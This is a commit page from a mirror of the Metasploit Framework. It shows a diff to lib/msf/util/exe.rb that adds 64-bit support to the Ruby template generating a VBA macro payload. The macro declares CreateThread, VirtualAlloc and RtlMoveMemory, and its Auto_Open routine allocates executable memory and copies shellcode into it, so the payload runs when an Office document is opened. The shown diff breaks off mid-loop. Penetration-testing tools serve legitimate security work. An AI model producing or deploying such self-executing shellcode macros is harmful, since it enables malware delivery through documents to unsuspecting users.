dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #123 from scriptjunkie/master 

x64 LongPtr support for in-mem VBA shellcode
This commit is contained in:
sinn3r 2012-01-23 09:59:54 -08:00
parent ea9e9852cf c5590a6c40
commit a328bb21f1
1 changed files with 13 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
lib/msf/util/exe.rb Normal file → Executable file
View File

@ -837,12 +837,23 @@ require 'digest/sha1'
bytes << " _\r\n" if (idx > 1 and (idx % maxbytes) == 0)
end
"Private Declare Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As Long, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As Long
"#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As LongPtr, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib \"kernel32\" (ByVal #{var_lpAddr} As Long, ByVal #{var_lSize} As Long, ByVal #{var_flAllocationType} As Long, ByVal #{var_flProtect} As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib \"kernel32\" (ByVal #{var_lDest} As LongPtr, ByRef #{var_Source} As Any, ByVal #{var_Length} As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As Long, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As Long
Private Declare Function VirtualAlloc Lib \"kernel32\" (ByVal #{var_lpAddr} As Long, ByVal #{var_lSize} As Long, ByVal #{var_flAllocationType} As Long, ByVal #{var_flProtect} As Long) As Long
Private Declare Function RtlMoveMemory Lib \"kernel32\" (ByVal #{var_lDest} As Long, ByRef #{var_Source} As Any, ByVal #{var_Length} As Long) As Long
#EndIf
Sub Auto_Open()
Dim #{var_myByte} As Long, #{var_myArray} As Variant, #{var_rwxpage} As Long, #{var_res} As Long, #{var_offset} As Long
Dim #{var_myByte} As Long, #{var_myArray} As Variant, #{var_res} As Long, #{var_offset} As Long
#If Vba7 Then
Dim #{var_rwxpage} As LongPtr
#Else
Dim #{var_rwxpage} As Long
#EndIf
#{var_myArray} = Array(#{bytes})
#{var_rwxpage} = VirtualAlloc(0, UBound(#{var_myArray}), &H1000, &H40)
For #{var_offset} = LBound(#{var_myArray}) To UBound(#{var_myArray})